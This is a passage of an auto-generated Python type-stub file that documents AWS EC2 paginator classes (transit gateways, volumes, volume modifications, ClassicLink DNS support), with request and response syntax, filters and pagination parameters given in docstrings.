* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeTransitGatewayRouteTables(Paginator):
def paginate(self, TransitGatewayRouteTableIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_transit_gateway_route_tables`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTransitGatewayRouteTables>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
TransitGatewayRouteTableIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'TransitGatewayRouteTables': [
{
'TransitGatewayRouteTableId': 'string',
'TransitGatewayId': 'string',
'State': 'pending'|'available'|'deleting'|'deleted',
'DefaultAssociationRouteTable': True|False,
'DefaultPropagationRouteTable': True|False,
'CreationTime': datetime(2015, 1, 1),
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **TransitGatewayRouteTables** *(list) --*
Information about the transit gateway route tables.
- *(dict) --*
Describes a transit gateway route table.
- **TransitGatewayRouteTableId** *(string) --*
The ID of the transit gateway route table.
- **TransitGatewayId** *(string) --*
The ID of the transit gateway.
- **State** *(string) --*
The state of the transit gateway route table.
- **DefaultAssociationRouteTable** *(boolean) --*
Indicates whether this is the default association route table for the transit gateway.
- **DefaultPropagationRouteTable** *(boolean) --*
Indicates whether this is the default propagation route table for the transit gateway.
- **CreationTime** *(datetime) --*
The creation time.
- **Tags** *(list) --*
Any tags assigned to the route table.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type TransitGatewayRouteTableIds: list
:param TransitGatewayRouteTableIds:
The IDs of the transit gateway route tables.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters. The possible values are:
* ``default-association-route-table`` - Indicates whether this is the default association route table for the transit gateway (``true`` | ``false`` ).
* ``default-propagation-route-table`` - Indicates whether this is the default propagation route table for the transit gateway (``true`` | ``false`` ).
* ``state`` - The state of the attachment (``available`` | ``deleted`` | ``deleting`` | ``failed`` | ``modifying`` | ``pendingAcceptance`` | ``pending`` | ``rollingBack`` | ``rejected`` | ``rejecting`` ).
* ``transit-gateway-id`` - The ID of the transit gateway.
* ``transit-gateway-route-table-id`` - The ID of the transit gateway route table.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeTransitGatewayVpcAttachments(Paginator):
def paginate(self, TransitGatewayAttachmentIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_transit_gateway_vpc_attachments`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTransitGatewayVpcAttachments>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
TransitGatewayAttachmentIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'TransitGatewayVpcAttachments': [
{
'TransitGatewayAttachmentId': 'string',
'TransitGatewayId': 'string',
'VpcId': 'string',
'VpcOwnerId': 'string',
'State': 'pendingAcceptance'|'rollingBack'|'pending'|'available'|'modifying'|'deleting'|'deleted'|'failed'|'rejected'|'rejecting'|'failing',
'SubnetIds': [
'string',
],
'CreationTime': datetime(2015, 1, 1),
'Options': {
'DnsSupport': 'enable'|'disable',
'Ipv6Support': 'enable'|'disable'
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **TransitGatewayVpcAttachments** *(list) --*
Information about the VPC attachments.
- *(dict) --*
Describes a VPC attachment.
- **TransitGatewayAttachmentId** *(string) --*
The ID of the attachment.
- **TransitGatewayId** *(string) --*
The ID of the transit gateway.
- **VpcId** *(string) --*
The ID of the VPC.
- **VpcOwnerId** *(string) --*
The ID of the AWS account that owns the VPC.
- **State** *(string) --*
The state of the VPC attachment.
- **SubnetIds** *(list) --*
The IDs of the subnets.
- *(string) --*
- **CreationTime** *(datetime) --*
The creation time.
- **Options** *(dict) --*
The VPC attachment options.
- **DnsSupport** *(string) --*
Indicates whether DNS support is enabled.
- **Ipv6Support** *(string) --*
Indicates whether IPv6 support is enabled.
- **Tags** *(list) --*
The tags for the VPC attachment.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type TransitGatewayAttachmentIds: list
:param TransitGatewayAttachmentIds:
The IDs of the attachments.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters. The possible values are:
* ``state`` - The state of the attachment (``available`` | ``deleted`` | ``deleting`` | ``failed`` | ``modifying`` | ``pendingAcceptance`` | ``pending`` | ``rollingBack`` | ``rejected`` | ``rejecting`` ).
* ``transit-gateway-attachment-id`` - The ID of the attachment.
* ``transit-gateway-id`` - The ID of the transit gateway.
* ``vpc-id`` - The ID of the VPC.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeTransitGateways(Paginator):
def paginate(self, TransitGatewayIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_transit_gateways`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTransitGateways>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
TransitGatewayIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'TransitGateways': [
{
'TransitGatewayId': 'string',
'TransitGatewayArn': 'string',
'State': 'pending'|'available'|'modifying'|'deleting'|'deleted',
'OwnerId': 'string',
'Description': 'string',
'CreationTime': datetime(2015, 1, 1),
'Options': {
'AmazonSideAsn': 123,
'AutoAcceptSharedAttachments': 'enable'|'disable',
'DefaultRouteTableAssociation': 'enable'|'disable',
'AssociationDefaultRouteTableId': 'string',
'DefaultRouteTablePropagation': 'enable'|'disable',
'PropagationDefaultRouteTableId': 'string',
'VpnEcmpSupport': 'enable'|'disable',
'DnsSupport': 'enable'|'disable'
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **TransitGateways** *(list) --*
Information about the transit gateways.
- *(dict) --*
Describes a transit gateway.
- **TransitGatewayId** *(string) --*
The ID of the transit gateway.
- **TransitGatewayArn** *(string) --*
The Amazon Resource Name (ARN) of the transit gateway.
- **State** *(string) --*
The state of the transit gateway.
- **OwnerId** *(string) --*
The ID of the AWS account ID that owns the transit gateway.
- **Description** *(string) --*
The description of the transit gateway.
- **CreationTime** *(datetime) --*
The creation time.
- **Options** *(dict) --*
The transit gateway options.
- **AmazonSideAsn** *(integer) --*
A private Autonomous System Number (ASN) for the Amazon side of a BGP session. The range is 64512 to 65534 for 16-bit ASNs and 4200000000 to 4294967294 for 32-bit ASNs.
- **AutoAcceptSharedAttachments** *(string) --*
Indicates whether attachment requests are automatically accepted.
- **DefaultRouteTableAssociation** *(string) --*
Indicates whether resource attachments are automatically associated with the default association route table.
- **AssociationDefaultRouteTableId** *(string) --*
The ID of the default association route table.
- **DefaultRouteTablePropagation** *(string) --*
Indicates whether resource attachments automatically propagate routes to the default propagation route table.
- **PropagationDefaultRouteTableId** *(string) --*
The ID of the default propagation route table.
- **VpnEcmpSupport** *(string) --*
Indicates whether Equal Cost Multipath Protocol support is enabled.
- **DnsSupport** *(string) --*
Indicates whether DNS support is enabled.
- **Tags** *(list) --*
The tags for the transit gateway.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type TransitGatewayIds: list
:param TransitGatewayIds:
The IDs of the transit gateways.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters. The possible values are:
* ``options.propagation-default-route-table-id`` - The ID of the default propagation route table.
* ``options.amazon-side-asn`` - The private ASN for the Amazon side of a BGP session.
* ``options.association-default-route-table-id`` - The ID of the default association route table.
* ``options.auto-accept-shared-attachments`` - Indicates whether there is automatic acceptance of attachment requests (``enable`` | ``disable`` ).
* ``options.default-route-table-association`` - Indicates whether resource attachments are automatically associated with the default association route table (``enable`` | ``disable`` ).
* ``options.default-route-table-propagation`` - Indicates whether resource attachments automatically propagate routes to the default propagation route table (``enable`` | ``disable`` ).
* ``options.dns-support`` - Indicates whether DNS support is enabled (``enable`` | ``disable`` ).
* ``options.vpn-ecmp-support`` - Indicates whether Equal Cost Multipath Protocol support is enabled (``enable`` | ``disable`` ).
* ``owner-id`` - The ID of the AWS account that owns the transit gateway.
* ``state`` - The state of the attachment (``available`` | ``deleted`` | ``deleting`` | ``failed`` | ``modifying`` | ``pendingAcceptance`` | ``pending`` | ``rollingBack`` | ``rejected`` | ``rejecting`` ).
* ``transit-gateway-id`` - The ID of the transit gateway.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVolumeStatus(Paginator):
def paginate(self, Filters: List = None, VolumeIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_volume_status`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVolumeStatus>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
VolumeIds=[
'string',
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'VolumeStatuses': [
{
'Actions': [
{
'Code': 'string',
'Description': 'string',
'EventId': 'string',
'EventType': 'string'
},
],
'AvailabilityZone': 'string',
'Events': [
{
'Description': 'string',
'EventId': 'string',
'EventType': 'string',
'NotAfter': datetime(2015, 1, 1),
'NotBefore': datetime(2015, 1, 1)
},
],
'VolumeId': 'string',
'VolumeStatus': {
'Details': [
{
'Name': 'io-enabled'|'io-performance',
'Status': 'string'
},
],
'Status': 'ok'|'impaired'|'insufficient-data'
}
},
]
}
**Response Structure**
- *(dict) --*
- **VolumeStatuses** *(list) --*
Information about the status of the volumes.
- *(dict) --*
Describes the volume status.
- **Actions** *(list) --*
The details of the operation.
- *(dict) --*
Describes a volume status operation code.
- **Code** *(string) --*
The code identifying the operation, for example, ``enable-volume-io`` .
- **Description** *(string) --*
A description of the operation.
- **EventId** *(string) --*
The ID of the event associated with this operation.
- **EventType** *(string) --*
The event type associated with this operation.
- **AvailabilityZone** *(string) --*
The Availability Zone of the volume.
- **Events** *(list) --*
A list of events associated with the volume.
- *(dict) --*
Describes a volume status event.
- **Description** *(string) --*
A description of the event.
- **EventId** *(string) --*
The ID of this event.
- **EventType** *(string) --*
The type of this event.
- **NotAfter** *(datetime) --*
The latest end time of the event.
- **NotBefore** *(datetime) --*
The earliest start time of the event.
- **VolumeId** *(string) --*
The volume ID.
- **VolumeStatus** *(dict) --*
The volume status.
- **Details** *(list) --*
The details of the volume status.
- *(dict) --*
Describes a volume status.
- **Name** *(string) --*
The name of the volume status.
- **Status** *(string) --*
The intended status of the volume status.
- **Status** *(string) --*
The status of the volume.
:type Filters: list
:param Filters:
The filters.
* ``action.code`` - The action code for the event (for example, ``enable-volume-io`` ).
* ``action.description`` - A description of the action.
* ``action.event-id`` - The event ID associated with the action.
* ``availability-zone`` - The Availability Zone of the instance.
* ``event.description`` - A description of the event.
* ``event.event-id`` - The event ID.
* ``event.event-type`` - The event type (for ``io-enabled`` : ``passed`` | ``failed`` ; for ``io-performance`` : ``io-performance:degraded`` | ``io-performance:severely-degraded`` | ``io-performance:stalled`` ).
* ``event.not-after`` - The latest end time for the event.
* ``event.not-before`` - The earliest start time for the event.
* ``volume-status.details-name`` - The cause for ``volume-status.status`` (``io-enabled`` | ``io-performance`` ).
* ``volume-status.details-status`` - The status of ``volume-status.details-name`` (for ``io-enabled`` : ``passed`` | ``failed`` ; for ``io-performance`` : ``normal`` | ``degraded`` | ``severely-degraded`` | ``stalled`` ).
* ``volume-status.status`` - The status of the volume (``ok`` | ``impaired`` | ``warning`` | ``insufficient-data`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type VolumeIds: list
:param VolumeIds:
The IDs of the volumes.
Default: Describes all your volumes.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVolumes(Paginator):
def paginate(self, Filters: List = None, VolumeIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_volumes`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVolumes>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
VolumeIds=[
'string',
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Volumes': [
{
'Attachments': [
{
'AttachTime': datetime(2015, 1, 1),
'Device': 'string',
'InstanceId': 'string',
'State': 'attaching'|'attached'|'detaching'|'detached'|'busy',
'VolumeId': 'string',
'DeleteOnTermination': True|False
},
],
'AvailabilityZone': 'string',
'CreateTime': datetime(2015, 1, 1),
'Encrypted': True|False,
'KmsKeyId': 'string',
'Size': 123,
'SnapshotId': 'string',
'State': 'creating'|'available'|'in-use'|'deleting'|'deleted'|'error',
'VolumeId': 'string',
'Iops': 123,
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'VolumeType': 'standard'|'io1'|'gp2'|'sc1'|'st1'
},
],
}
**Response Structure**
- *(dict) --*
- **Volumes** *(list) --*
Information about the volumes.
- *(dict) --*
Describes a volume.
- **Attachments** *(list) --*
Information about the volume attachments.
- *(dict) --*
Describes volume attachment details.
- **AttachTime** *(datetime) --*
The time stamp when the attachment initiated.
- **Device** *(string) --*
The device name.
- **InstanceId** *(string) --*
The ID of the instance.
- **State** *(string) --*
The attachment state of the volume.
- **VolumeId** *(string) --*
The ID of the volume.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the EBS volume is deleted on instance termination.
- **AvailabilityZone** *(string) --*
The Availability Zone for the volume.
- **CreateTime** *(datetime) --*
The time stamp when volume creation was initiated.
- **Encrypted** *(boolean) --*
Indicates whether the volume will be encrypted.
- **KmsKeyId** *(string) --*
The full ARN of the AWS Key Management Service (AWS KMS) customer master key (CMK) that was used to protect the volume encryption key for the volume.
- **Size** *(integer) --*
The size of the volume, in GiBs.
- **SnapshotId** *(string) --*
The snapshot from which the volume was created, if applicable.
- **State** *(string) --*
The volume state.
- **VolumeId** *(string) --*
The ID of the volume.
- **Iops** *(integer) --*
The number of I/O operations per second (IOPS) that the volume supports. For Provisioned IOPS SSD volumes, this represents the number of IOPS that are provisioned for the volume. For General Purpose SSD volumes, this represents the baseline performance of the volume and the rate at which the volume accumulates I/O credits for bursting. For more information, see `Amazon EBS Volume Types <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
Constraints: Range is 100-16,000 IOPS for ``gp2`` volumes and 100 to 64,000IOPS for ``io1`` volumes, in most Regions. The maximum IOPS for ``io1`` of 64,000 is guaranteed only on `Nitro-based instances <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html#ec2-nitro-instances>`__ . Other instance families guarantee performance up to 32,000 IOPS.
Condition: This parameter is required for requests to create ``io1`` volumes; it is not used in requests to create ``gp2`` , ``st1`` , ``sc1`` , or ``standard`` volumes.
- **Tags** *(list) --*
Any tags assigned to the volume.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **VolumeType** *(string) --*
The volume type. This can be ``gp2`` for General Purpose SSD, ``io1`` for Provisioned IOPS SSD, ``st1`` for Throughput Optimized HDD, ``sc1`` for Cold HDD, or ``standard`` for Magnetic volumes.
:type Filters: list
:param Filters:
The filters.
* ``attachment.attach-time`` - The time stamp when the attachment initiated.
* ``attachment.delete-on-termination`` - Whether the volume is deleted on instance termination.
* ``attachment.device`` - The device name specified in the block device mapping (for example, ``/dev/sda1`` ).
* ``attachment.instance-id`` - The ID of the instance the volume is attached to.
* ``attachment.status`` - The attachment state (``attaching`` | ``attached`` | ``detaching`` ).
* ``availability-zone`` - The Availability Zone in which the volume was created.
* ``create-time`` - The time stamp when the volume was created.
* ``encrypted`` - Indicates whether the volume is encrypted (``true`` | ``false`` )
* ``size`` - The size of the volume, in GiB.
* ``snapshot-id`` - The snapshot from which the volume was created.
* ``status`` - The status of the volume (``creating`` | ``available`` | ``in-use`` | ``deleting`` | ``deleted`` | ``error`` ).
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``volume-id`` - The volume ID.
* ``volume-type`` - The Amazon EBS volume type. This can be ``gp2`` for General Purpose SSD, ``io1`` for Provisioned IOPS SSD, ``st1`` for Throughput Optimized HDD, ``sc1`` for Cold HDD, or ``standard`` for Magnetic volumes.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type VolumeIds: list
:param VolumeIds:
The volume IDs.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVolumesModifications(Paginator):
def paginate(self, DryRun: bool = None, VolumeIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_volumes_modifications`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVolumesModifications>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
VolumeIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'VolumesModifications': [
{
'VolumeId': 'string',
'ModificationState': 'modifying'|'optimizing'|'completed'|'failed',
'StatusMessage': 'string',
'TargetSize': 123,
'TargetIops': 123,
'TargetVolumeType': 'standard'|'io1'|'gp2'|'sc1'|'st1',
'OriginalSize': 123,
'OriginalIops': 123,
'OriginalVolumeType': 'standard'|'io1'|'gp2'|'sc1'|'st1',
'Progress': 123,
'StartTime': datetime(2015, 1, 1),
'EndTime': datetime(2015, 1, 1)
},
],
}
**Response Structure**
- *(dict) --*
- **VolumesModifications** *(list) --*
Information about the volume modifications.
- *(dict) --*
Describes the modification status of an EBS volume.
If the volume has never been modified, some element values will be null.
- **VolumeId** *(string) --*
The ID of the volume.
- **ModificationState** *(string) --*
The current modification state. The modification state is null for unmodified volumes.
- **StatusMessage** *(string) --*
A status message about the modification progress or failure.
- **TargetSize** *(integer) --*
The target size of the volume, in GiB.
- **TargetIops** *(integer) --*
The target IOPS rate of the volume.
- **TargetVolumeType** *(string) --*
The target EBS volume type of the volume.
- **OriginalSize** *(integer) --*
The original size of the volume.
- **OriginalIops** *(integer) --*
The original IOPS rate of the volume.
- **OriginalVolumeType** *(string) --*
The original EBS volume type of the volume.
- **Progress** *(integer) --*
The modification progress, from 0 to 100 percent complete.
- **StartTime** *(datetime) --*
The modification start time.
- **EndTime** *(datetime) --*
The modification completion or failure time.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type VolumeIds: list
:param VolumeIds:
The IDs of the volumes for which in-progress modifications will be described.
- *(string) --*
:type Filters: list
:param Filters:
The filters. Supported filters: ``volume-id`` , ``modification-state`` , ``target-size`` , ``target-iops`` , ``target-volume-type`` , ``original-size`` , ``original-iops`` , ``original-volume-type`` , ``start-time`` .
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVpcClassicLinkDnsSupport(Paginator):
def paginate(self, VpcIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_classic_link_dns_support`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcClassicLinkDnsSupport>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
VpcIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Vpcs': [
{
'ClassicLinkDnsSupported': True|False,
'VpcId': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Vpcs** *(list) --*
Information about the ClassicLink DNS support status of the VPCs.
- *(dict) --*
Describes the ClassicLink DNS support status of a VPC.
- **ClassicLinkDnsSupported** *(boolean) --*
Indicates whether ClassicLink DNS support is enabled for the VPC.
- **VpcId** *(string) --*
The ID of the VPC.
:type VpcIds: list
:param VpcIds:
One or more VPC IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVpcEndpointConnectionNotifications(Paginator):
def paginate(self, DryRun: bool = None, ConnectionNotificationId: str = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
